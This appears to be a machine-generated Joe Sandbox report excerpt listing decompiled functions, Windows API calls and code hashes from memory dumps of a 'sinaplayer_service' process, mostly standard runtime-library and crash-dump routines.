                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FDC5
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 0037FDD0
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FE2C
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037FE65
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FE8A
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathV01@V01@@V12@$??3@Append@Exists@base@@Get@Name@Path@1@@Path@base@@@Service@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@
                                                                                                                                                                                                    • String ID: sinaplayer.exe
                                                                                                                                                                                                    • API String ID: 1139831594-3097596253
                                                                                                                                                                                                    • Opcode ID: 26c5063ead3ad56e7cb34bba465393ff2b6e4c78c02aa9d2d17dc034e80b9013
                                                                                                                                                                                                    • Instruction ID: 5a08e3bd98e0a45c30c16dcbc51abaced5f1424a27aee08c00382618e44a6362
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26c5063ead3ad56e7cb34bba465393ff2b6e4c78c02aa9d2d17dc034e80b9013
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF41B130905298DEDF66E7A8CC59BEDBBB8AF16304F1041DAD40EA3291DF341B48CB21
                                                                                                                                                                                                    Function 6C5B8FB1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • malloc.MSVCR120(00000008,00000000), ref: 6C5B8FBC
                                                                                                                                                                                                      • Part of subcall function 6C55ED30: HeapAlloc.KERNEL32(00EB0000,00000000,6C5CC0AD,00000000,?,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000), ref: 6C55ED5D
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001,00000000), ref: 6C5B8FFA
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C57C7FC,?,00000001,00000000), ref: 6C5B900F
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6C5B901C
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000001C,0000001C,6C5C7D40,6C5C7DB6), ref: 6C5B9025
                                                                                                                                                                                                    • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR120(?,0000001C,6C5C7D40,6C5C7DB6), ref: 6C5B907E
                                                                                                                                                                                                    • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120(?,0000001C,6C5C7D40,6C5C7DB6), ref: 6C5B90A0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$??0scoped_lock@critical_section@??2@?unlock@critical_section@AllocExceptionH_prolog3HeapThrowV12@@mallocstd::exception::exception
                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                    • API String ID: 3930479332-2104205924
                                                                                                                                                                                                    • Opcode ID: b450f568cad95fb5190385ec2ad32b2b8ed590d469b60141e9a39676e759694a
                                                                                                                                                                                                    • Instruction ID: 90743ae9b64160c210ed39990e6e19a774881fde93b2d08ec03206f4a7ff1148
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b450f568cad95fb5190385ec2ad32b2b8ed590d469b60141e9a39676e759694a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D318C7190170ADBC724DF25C8A1A8ABFF4FF50314F10892ED8556BB50DB71AA49CB91
                                                                                                                                                                                                    Function 6C5C88EB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6C5C88F2
                                                                                                                                                                                                    • malloc.MSVCR120(?,00000020,6C5C921D,?,?,?), ref: 6C5C895D
                                                                                                                                                                                                      • Part of subcall function 6C55ED30: HeapAlloc.KERNEL32(00EB0000,00000000,6C5CC0AD,00000000,?,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000), ref: 6C55ED5D
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,00000020,6C5C921D,?,?,?), ref: 6C5C8989
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C57C7FC,00000000,00000001,00000020,6C5C921D,?,?,?), ref: 6C5C899E
                                                                                                                                                                                                    • ?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR120(00000000,00000002,00000001,000000FF,00000020,6C5C921D,?,?,?), ref: 6C5C89CE
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,00000000,00000002,00000001,000000FF,00000020,6C5C921D,?,?,?), ref: 6C5C89D4
                                                                                                                                                                                                    • ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000020,6C5C921D,?,?,?), ref: 6C5C89E3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$?wait@event@?wait_for_multiple@event@AllocExceptionH_prolog3_HeapThrowV12@_freea_smallocstd::exception::exception
                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                    • API String ID: 559173246-2104205924
                                                                                                                                                                                                    • Opcode ID: 0b1c1b150c4364688d941cb69ba91759774690aba64e39b98c3607a4f081d35f
                                                                                                                                                                                                    • Instruction ID: d53c9aeecf382916e6f2e336f940842eeea7a1e4cdcf243ffe2f84717e303ca9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b1c1b150c4364688d941cb69ba91759774690aba64e39b98c3607a4f081d35f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1031CDB1E0021A8BDB10DF94CC81A9EB7B8EF45714F60411ED845BBB50DB348E45CBA7
                                                                                                                                                                                                    Function 6C57AA6B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                    • API String ID: 1333004437-2211150622
                                                                                                                                                                                                    • Opcode ID: 90e83f802b5252d422150e7ac344da52864ad0b81bf311c1d2bbdf962e1c76c0
                                                                                                                                                                                                    • Instruction ID: eac87bbc615548a38406570f95413690340130f47a37f1c3a8c82b7898675ee2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90e83f802b5252d422150e7ac344da52864ad0b81bf311c1d2bbdf962e1c76c0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0218C7470424A8FCB10DF9EC891AAD3BF4FB4A344F005159E9599BB00CB32E946CB94
                                                                                                                                                                                                    Function 6C566F4B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C55F764: _getptd.MSVCR120(00000001,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C55F77A
                                                                                                                                                                                                    • __crtCompareStringA.MSVCR120(?,?,00001001,00ED4598,?,?,?,00000000,00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78), ref: 6C566FAF
                                                                                                                                                                                                    • _strnicmp_l.MSVCR120(00ED4598,?,?,?,00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000), ref: 6C57E3F6
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5AAB98
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5AABA3
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5AABB2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5AABBD
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000), ref: 6C5AABC7
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$CompareString__crt_getptd_strnicmp_l
                                                                                                                                                                                                    • String ID: xL
                                                                                                                                                                                                    • API String ID: 535387727-2859553101
                                                                                                                                                                                                    • Opcode ID: 8343183528071228cd948c9da2a8cc03f2dbce6e916447550be9f97a05173cab
                                                                                                                                                                                                    • Instruction ID: 099c712864e1906c1b891316e871d896a7b85b9b5fe780e65f84a61479a5fcd1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8343183528071228cd948c9da2a8cc03f2dbce6e916447550be9f97a05173cab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C021C671611219AFEB10DEA6CC40AFFB36CEF41365F100A58E83097EA0DB319C058BB1
                                                                                                                                                                                                    Function 6C564DF1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,?,?,?,6C564F10,?,6C564F30,00000010), ref: 6C564DFA
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?), ref: 6C564E1D
                                                                                                                                                                                                      • Part of subcall function 6C564D4B: __doserrno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C564D84
                                                                                                                                                                                                      • Part of subcall function 6C564D4B: _errno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFE6
                                                                                                                                                                                                      • Part of subcall function 6C564D4B: _invalid_parameter_noinfo.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFF1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6C564E24
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(00000002), ref: 6C582A17
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(00000001,00000002), ref: 6C582A20
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C5AE211
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: po
                                                                                                                                                                                                    • API String ID: 1012986785-679877212
                                                                                                                                                                                                    • Opcode ID: e4c215b333314877bdcd921dce45831b86cf76996b9a36fbd7905e0cb2c7c22a
                                                                                                                                                                                                    • Instruction ID: 6d4dd955bc7ca433e5c62953fc5528b8ccaab13d815897e7aea277d1e3054e30
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4c215b333314877bdcd921dce45831b86cf76996b9a36fbd7905e0cb2c7c22a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B911483278616095D632D2779C787AE3B658F83B3CF25471DD9248FEF0CB658C418192
                                                                                                                                                                                                    Function 6C576ABC Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 57libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 6C576B3D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 6C576B48
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumberEx,?,?,?,?,?,6C576C5D), ref: 6C576B77
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C576B7E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                    • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$]lWl$kernel32.dll
                                                                                                                                                                                                    • API String ID: 667068680-3195207190
                                                                                                                                                                                                    • Opcode ID: b92d16ea55e52837b9218b25c01be47d47ded30aa9afa18c2b4cbd51734c7cf4
                                                                                                                                                                                                    • Instruction ID: 3e5a5432a0b13ed0ad324be8ecde5774d29a7691c2984d804348411c9bd8b583
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b92d16ea55e52837b9218b25c01be47d47ded30aa9afa18c2b4cbd51734c7cf4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D0140347027D9DB9B308A669CD4A5BBFF4EF86704B00892DD48AD7D01DB719D048B99
                                                                                                                                                                                                    Function 0038FD90 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?,000000FF,?,?,?,0038FF03,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FDA6
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0038EBA0,?,0038FF03,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FDB8
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(dbghelp.dll,?,0038FF03,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FDC4
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0038EBA0,?,0038FF03,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FDD2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(76EBFFB0,MiniDumpWriteDump), ref: 0038FDDE
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0038EBA0,?,0038FF03,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FDED
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$AddressLibraryLoadProc
                                                                                                                                                                                                    • String ID: MiniDumpWriteDump$dbghelp.dll
                                                                                                                                                                                                    • API String ID: 2049748340-4105291546
                                                                                                                                                                                                    • Opcode ID: fa588cb61b5941f9f930fead1165861cb30f484b61998bf1334107f6b4db46ac
                                                                                                                                                                                                    • Instruction ID: 37e40add4cf85590262c7c2d848a5cd9c1754f782f785b04da6ea1fe910c56fc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa588cb61b5941f9f930fead1165861cb30f484b61998bf1334107f6b4db46ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24014671500308AFCB22ABA8DC45AAAF7FCFB48724F11096EE685D3210D771ED018BA0
                                                                                                                                                                                                    Function 0038FE70 Relevance: 13.8, APIs: 9, Instructions: 277COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120 ref: 0038FFBF
                                                                                                                                                                                                    • memset.MSVCR120 ref: 0038FFD2
                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000308,?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 00390013
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 00390035
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0039003D
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR120(00000000,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 00390042
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0039014A
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 00390152
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR120(00000000,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 00390166
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle$memset$MemoryProcessRead
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3544107872-0
                                                                                                                                                                                                    • Opcode ID: 425e82b1b03d7aa79c99d298575e47dc239d28d5553074bf9b85dfc19c6fdaec
                                                                                                                                                                                                    • Instruction ID: 77949660e2236f27efdb925f3e76081025943d90ad6317d568007fb1d8de709b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 425e82b1b03d7aa79c99d298575e47dc239d28d5553074bf9b85dfc19c6fdaec
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83C13874A012189FDF26CF28C884BAAB7F8BF08314F1541E9E959A7291D734AF85CF50
                                                                                                                                                                                                    Function 6C572837 Relevance: 13.7, APIs: 9, Instructions: 195COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(?,00006A69), ref: 6C571A4A
                                                                                                                                                                                                    • free.MSVCR120(?,?,00006A69), ref: 6C571A55
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000050), ref: 6C572860
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6C572881
                                                                                                                                                                                                      • Part of subcall function 6C562226: malloc.MSVCR120(6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C562237
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6C5728A4
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6C5B01B6
                                                                                                                                                                                                    • ___free_lconv_num.LIBCMT ref: 6C5B01C7
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6C5B01D4
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6C5B01DD
                                                                                                                                                                                                      • Part of subcall function 6C571BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,00000000), ref: 6C571C46
                                                                                                                                                                                                      • Part of subcall function 6C571BFC: _calloc_crt.MSVCR120(00000000,00000002,?,?,?,00000000), ref: 6C571C5B
                                                                                                                                                                                                      • Part of subcall function 6C571BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,?,00000000), ref: 6C571C77
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
